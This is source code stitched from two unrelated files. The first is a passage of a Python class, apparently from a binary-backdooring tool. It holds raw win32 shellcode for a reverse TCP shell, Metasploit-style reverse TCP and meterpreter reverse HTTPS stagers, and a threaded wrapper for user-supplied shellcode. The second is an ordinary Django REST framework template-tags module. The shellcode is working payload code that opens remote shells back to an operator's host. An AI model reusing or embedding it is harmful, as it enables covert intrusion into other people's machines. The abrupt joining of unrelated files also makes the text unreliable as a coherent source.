b"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
b"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"
)
self.shellcode2 = (b"\x5d\x68\x33\x32\x00\x00\x68"
b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
b"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
b"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
b"\x68"
)
self.shellcode2 += self.__pack_ip_addresses() # IP
self.shellcode2 += b"\x68\x02\x00"
self.shellcode2 += struct.pack('!H', self.port) # PORT
self.shellcode2 += (b"\x89\xe6\x6a\x10\x56"
b"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
b"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
b"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
b"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
# The NOP in the line below allows for continued execution.
b"\xe0\x4e\x90\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
b"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
b"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
b"\x81\xc4\xfc\x01\x00\x00"
)
return self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
def reverse_tcp_stager_threaded(self):
"""
Reverse tcp stager. Can be used with windows/shell/reverse_tcp or
windows/meterpreter/reverse_tcp payloads from metasploit.
"""
self.shellcode2 = b"\xE8\xB7\xFF\xFF\xFF"
self.shellcode2 += (b"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52"
b"\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC"
b"\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B"
b"\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0"
b"\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01"
b"\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03"
b"\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C"
b"\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B"
b"\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68"
b"\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF"
b"\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF"
b"\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5"
b"\x97\x6A\x05\x68"
)
self.shellcode2 += self.__pack_ip_addresses() # IP
self.shellcode2 += b"\x68\x02\x00"
self.shellcode2 += struct.pack('!H', self.port)
self.shellcode2 += (b"\x89\xE6\x6A"
b"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E"
b"\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57"
b"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00"
b"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53"
b"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
)
# Shellcode1 is the thread
self.shellcode1 = (b"\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
b"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
b"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
b"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
b"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
b"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
b"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
b"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
b"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
b"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
b"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
b"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
b"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
b"\x5D\x90"
b"\xBE")
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
self.shellcode1 += (b"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
b"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
b"\x89\xF1"
)
self.shellcode1 += b"\xeb\x44" # <--length of shellcode below
self.shellcode1 += b"\x90\x5e"
self.shellcode1 += (b"\x90\x90\x90"
b"\xF2\xA4"
b"\xE8\x20\x00\x00"
b"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
b"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
b"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
b"\x58\x58\x90\x61"
)
self.shellcode1 += b"\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
return self.stackpreserve + self.shellcode1 + self.shellcode2
def meterpreter_reverse_https_threaded(self):
"""
Traditional meterpreter reverse https shellcode from metasploit
payload/windows/meterpreter/reverse_https
"""
self.shellcode2 = b"\xE8\xB7\xFF\xFF\xFF"
self.shellcode2 += (b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
b"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
b"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
b"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
b"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
b"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
b"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
b"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"
b"\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57"
b"\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x5f"
b"\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68")
self.shellcode2 += struct.pack("<H", self.port)
self.shellcode2 += (b"\x00\x00\x53"
b"\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x48\x59\x31\xd2\x52\x68"
b"\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b"
b"\xff\xd5\x89\xc6\x6a\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a"
b"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x31\xff\x57"
b"\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a"
b"\x4b\x74\x10\xeb\xd5\xeb\x49\xe8\xb3\xff\xff\xff\x2f\x48\x45"
b"\x56\x79\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00"
b"\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff"
b"\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68"
b"\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85"
b"\xc0\x75\xe5\x58\xc3\xe8\x51\xff\xff\xff")
self.shellcode2 += self.host.encode('Ascii')
self.shellcode2 += b"\x00"
# shellcode1 is the thread
self.shellcode1 = (b"\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
b"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
b"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
b"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
b"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
b"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
b"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
b"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
b"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
b"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
b"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
b"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
b"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
b"\x5D\x90"
)
self.shellcode1 += b"\xBE"
self.shellcode1 += struct.pack("<H", len(self.shellcode2) - 5)
self.shellcode1 += b"\x00\x00" # <---Size of shellcode2 in hex
self.shellcode1 += (b"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
b"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
b"\x89\xF1"
)
self.shellcode1 += b"\xeb\x44" # <--length of shellcode below
self.shellcode1 += b"\x90\x5e"
self.shellcode1 += (b"\x90\x90\x90"
b"\xF2\xA4"
b"\xE8\x20\x00\x00"
b"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
b"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
b"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
b"\x58\x58\x90\x61"
)
self.shellcode1 += b"\xE9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
return self.stackpreserve + self.shellcode1 + self.shellcode2
def demo_calc(self):
"""
win32 start calc shellcode
"""
return (b"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B"
b"\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01"
b"\xFE\x8B\x4C\x1F\x24\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45"
b"\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7")
def demo_nop(self):
"""
just nop!
"""
return b"\x90"
def user_supplied_shellcode(self):
"""
win32 raw/binary shellcode
"""
return self.supplied_shellcode
def user_supplied_shellcode_threaded(self):
"""
This module allows for the user to provide a win32 raw/binary
shellcode. Make sure to use a process safe exit function.
"""
# Begin shellcode 2:
self.shellcode2 = b"\xE8\xB7\xFF\xFF\xFF"
self.shellcode2 += self.supplied_shellcode
self.shellcode1 = (b"\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
b"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
b"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
b"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
b"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
b"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
b"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
b"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
b"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
b"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
b"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
b"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
b"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
b"\x5D\x90"
b"\xBE")
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
self.shellcode1 += (b"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
b"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
b"\x89\xF1"
)
self.shellcode1 += b"\xeb\x44" # <--length of shellcode below
self.shellcode1 += b"\x90\x5e"
self.shellcode1 += (b"\x90\x90\x90"
b"\xF2\xA4"
b"\xE8\x20\x00\x00"
b"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
b"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
b"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
b"\x58\x58\x90\x61"
)
self.shellcode1 += b"\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
return self.stackpreserve + self.shellcode1 + self.shellcode2
##########################################################
# END win32 shellcodes #
##########################################################
|
|
from __future__ import absolute_import, unicode_literals
import re
from collections import OrderedDict
from django import template
from django.template import loader
from django.utils import six
from django.utils.encoding import force_text, iri_to_uri
from django.utils.html import escape, format_html, smart_urlquote
from django.utils.safestring import SafeData, mark_safe
from rest_framework.compat import (
NoReverseMatch, markdown, pygments_highlight, reverse, template_render
)
from rest_framework.renderers import HTMLFormRenderer
from rest_framework.utils.urls import replace_query_param
register = template.Library()
# Regex for adding classes to html snippets
class_re = re.compile(r'(?<=class=["\'])(.*)(?=["\'])')
@register.tag(name='code')
def highlight_code(parser, token):
code = token.split_contents()[-1]
nodelist = parser.parse(('endcode',))
parser.delete_first_token()
return CodeNode(code, nodelist)
class CodeNode(template.Node):
style = 'emacs'
def __init__(self, lang, code):
self.lang = lang
self.nodelist = code
def render(self, context):
text = self.nodelist.render(context)
return pygments_highlight(text, self.lang, self.style)
@register.filter()
def with_location(fields, location):
return [
field for field in fields
if field.location == location
]
@register.simple_tag
def form_for_link(link):
import coreschema
properties = OrderedDict([
(field.name, field.schema or coreschema.String())
for field in link.fields
])
required = [
field.name
for field in link.fields
if field.required
]
schema = coreschema.Object(properties=properties, required=required)
return mark_safe(coreschema.render_to_form(schema))
@register.simple_tag
def render_markdown(markdown_text):
if not markdown:
return markdown_text
return mark_safe(markdown.markdown(markdown_text))
@register.simple_tag
def get_pagination_html(pager):
return pager.to_html()
@register.simple_tag
def render_form(serializer, template_pack=None):
style = {'template_pack': template_pack} if template_pack else {}
renderer = HTMLFormRenderer()
return renderer.render(serializer.data, None, {'style': style})
@register.simple_tag
def render_field(field, style):
renderer = style.get('renderer', HTMLFormRenderer())
return renderer.render_field(field, style)
@register.simple_tag
def optional_login(request):
"""
Include a login snippet if REST framework's login view is in the URLconf.
"""
try:
login_url = reverse('rest_framework:login')
except NoReverseMatch:
return ''
snippet = "<li><a href='{href}?next={next}'>Log in</a></li>"
snippet = format_html(snippet, href=login_url, next=escape(request.path))
return mark_safe(snippet)
@register.simple_tag
def optional_docs_login(request):
"""
Include a login snippet if REST framework's login view is in the URLconf.
"""
try:
login_url = reverse('rest_framework:login')
except NoReverseMatch:
return 'log in'
snippet = "<a href='{href}?next={next}'>log in</a>"
snippet = format_html(snippet, href=login_url, next=escape(request.path))
return mark_safe(snippet)
@register.simple_tag
def optional_logout(request, user):
"""
Include a logout snippet if REST framework's logout view is in the URLconf.
"""
try:
logout_url = reverse('rest_framework:logout')
except NoReverseMatch:
snippet = format_html('<li class="navbar-text">{user}</li>', user=escape(user))
return mark_safe(snippet)
snippet = """<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
{user}
<b class="caret"></b>
</a>
<ul class="dropdown-menu">
<li><a href='{href}?next={next}'>Log out</a></li>
</ul>
</li>"""
snippet = format_html(snippet, user=escape(user), href=logout_url, next=escape(request.path))
return mark_safe(snippet)
@register.simple_tag
def add_query_param(request, key, val):
"""
Add a query parameter to the current request url, and return the new url.
"""
iri = request.get_full_path()
uri = iri_to_uri(iri)
return escape(replace_query_param(uri, key, val))
@register.filter
def as_string(value):
if value is None:
return ''
return '%s' % value
@register.filter
def as_list_of_strings(value):
return [
'' if (item is None) else ('%s' % item)
for item in value
]
@register.filter
def add_class(value, css_class):
"""
http://stackoverflow.com/questions/4124220/django-adding-css-classes-when-rendering-form-fields-in-a-template
Inserts classes into template variables that contain HTML tags,
useful for modifying forms without needing to change the Form objects.
Usage:
{{ field.label_tag|add_class:"control-label" }}
In the case of REST Framework, the filter is used to add Bootstrap-specific
classes to the forms.
"""
html = six.text_type(value)
match = class_re.search(html)
if match:
m = re.search(r'^%s$|^%s\s|\s%s\s|\s%s$' % (css_class, css_class,
css_class, css_class),
match.group(1))
if not m:
return mark_safe(class_re.sub(match.group(1) + " " + css_class,
html))
else:
return mark_safe(html.replace('>', ' class="%s">' % css_class, 1))
return value
@register.filter
def format_value(value):
if getattr(value, 'is_hyperlink', False):
name = six.text_type(value.obj)
return mark_safe('<a href=%s>%s</a>' % (value, escape(name)))
if value is None or isinstance(value, bool):
return mark_safe('<code>%s</code>' % {True: 'true', False: 'false', None: 'null'}[value])
elif isinstance(value, list):
if any([isinstance(item, (list, dict)) for item in value]):
template = loader.get_template('rest_framework/admin/list_value.html')
else:
template = loader.get_template('rest_framework/admin/simple_list_value.html')
context = {'value': value}
return template_render(template, context)
elif isinstance(value, dict):
template = loader.get_template('rest_framework/admin/dict_value.html')
context = {'value': value}
return template_render(template, context)
elif isinstance(value, six.string_types):
if (
(value.startswith('http:') or value.startswith('https:')) and not
re.search(r'\s', value)
):
return mark_safe('<a href="{value}">{value}</a>'.format(value=escape(value)))
elif '@' in value and not re.search(r'\s', value):
return mark_safe('<a href="mailto:{value}">{value}</a>'.format(value=escape(value)))
elif '\n' in value:
return mark_safe('<pre>%s</pre>' % escape(value))
return six.text_type(value)
@register.filter
def items(value):
"""
Simple filter to return the items of the dict. Useful when the dict may
have a key 'items' which is resolved first in Django tempalte dot-notation
lookup. See issue #4931
Also see: https://stackoverflow.com/questions/15416662/django-template-loop-over-dictionary-items-with-items-as-key
"""
return value.items()
@register.filter
def schema_links(section, sec_key=None):
"""
Recursively find every link in a schema, even nested.
"""
NESTED_FORMAT = '%s > %s' # this format is used in docs/js/api.js:normalizeKeys
links = section.links
if section.data:
data = section.data.items()
for sub_section_key, sub_section in data:
new_links = schema_links(sub_section, sec_key=sub_section_key)
links.update(new_links)
if sec_key is not None:
new_links = OrderedDict()
for link_key, link in links.items():
new_key = NESTED_FORMAT % (sec_key, link_key)
new_links.update({new_key: link})
return new_links
return links
@register.filter
def add_nested_class(value):
if isinstance(value, dict):
return 'class=nested'
if isinstance(value, list) and any([isinstance(item, (list, dict)) for item in value]):
return 'class=nested'
return ''
# Bunch of stuff cloned from urlize
TRAILING_PUNCTUATION = ['.', ',', ':', ';', '.)', '"', "']", "'}", "'"]
WRAPPING_PUNCTUATION = [('(', ')'), ('<', '>'), ('[', ']'), ('<', '>'),
('"', '"'), ("'", "'")]
word_split_re = re.compile(r'(\s+)')
simple_url_re = re.compile(r'^https?://\[?\w', re.IGNORECASE)
simple_url_2_re = re.compile(r'^www\.|^(?!http)\w[^@]+\.(com|edu|gov|int|mil|net|org)$', re.IGNORECASE)
simple_email_re = re.compile(r'^\S+@\S+\.\S+$')
def smart_urlquote_wrapper(matched_url):
"""
Simple wrapper for smart_urlquote. ValueError("Invalid IPv6 URL") can
be raised here, see issue #1386
"""
try:
return smart_urlquote(matched_url)
except ValueError:
return None
@register.filter
def urlize_quoted_links(text, trim_url_limit=None, nofollow=True, autoescape=True):
"""
Converts any URLs in text into clickable links.
Works on http://, https://, www. links, and also on links ending in one of
the original seven gTLDs (.com, .edu, .gov, .int, .mil, .net, and .org).
Links can have trailing punctuation (periods, commas, close-parens) and
leading punctuation (opening parens) and it'll still do the right thing.
If trim_url_limit is not None, the URLs in link text longer than this limit
will truncated to trim_url_limit-3 characters and appended with an ellipsis.
If nofollow is True, the URLs in link text will get a rel="nofollow"
attribute.
If autoescape is True, the link text and URLs will get autoescaped.
"""
def trim_url(x, limit=trim_url_limit):
return limit is not None and (len(x) > limit and ('%s...' % x[:max(0, limit - 3)])) or x
safe_input = isinstance(text, SafeData)
words = word_split_re.split(force_text(text))
for i, word in enumerate(words):
if '.' in word or '@' in word or ':' in word:
# Deal with punctuation.
lead, middle, trail = '', word, ''
for punctuation in TRAILING_PUNCTUATION:
if middle.endswith(punctuation):
middle = middle[:-len(punctuation)]
trail = punctuation + trail
for opening, closing in WRAPPING_PUNCTUATION:
if middle.startswith(opening):
middle = middle[len(opening):]
lead = lead + opening
# Keep parentheses at the end only if they're balanced.
if (
middle.endswith(closing) and
middle.count(closing) == middle.count(opening) + 1
):
middle = middle[:-len(closing)]
trail = closing + trail
# Make URL we want to point to.
url = None
nofollow_attr = ' rel="nofollow"' if nofollow else ''
if simple_url_re.match(middle):
url = smart_urlquote_wrapper(middle)
elif simple_url_2_re.match(middle):
url = smart_urlquote_wrapper('http://%s' % middle)
elif ':' not in middle and simple_email_re.match(middle):
local, domain = middle.rsplit('@', 1)
try:
domain = domain.encode('idna').decode('ascii')
except UnicodeError:
continue
url = 'mailto:%s@%s' % (local, domain)
nofollow_attr = ''
# Make link.
if url:
trimmed = trim_url(middle)
if autoescape and not safe_input:
lead, trail = escape(lead), escape(trail)
url, trimmed = escape(url), escape(trimmed)
middle = '<a href="%s"%s>%s</a>' % (url, nofollow_attr, trimmed)
words[i] = mark_safe('%s%s%s' % (lead, middle, trail))
else:
if safe_input:
words[i] = mark_safe(word)
elif autoescape:
words[i] = escape(word)
elif safe_input:
words[i] = mark_safe(word)
elif autoescape:
words[i] = escape(word)
return ''.join(words)
@register.filter
def break_long_headers(header):
"""
Breaks headers longer than 160 characters (~page length)
when possible (are comma separated)
"""
if len(header) > 160 and ',' in header:
header = mark_safe('<br> ' + ', <br>'.join(header.split(',')))
return header
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.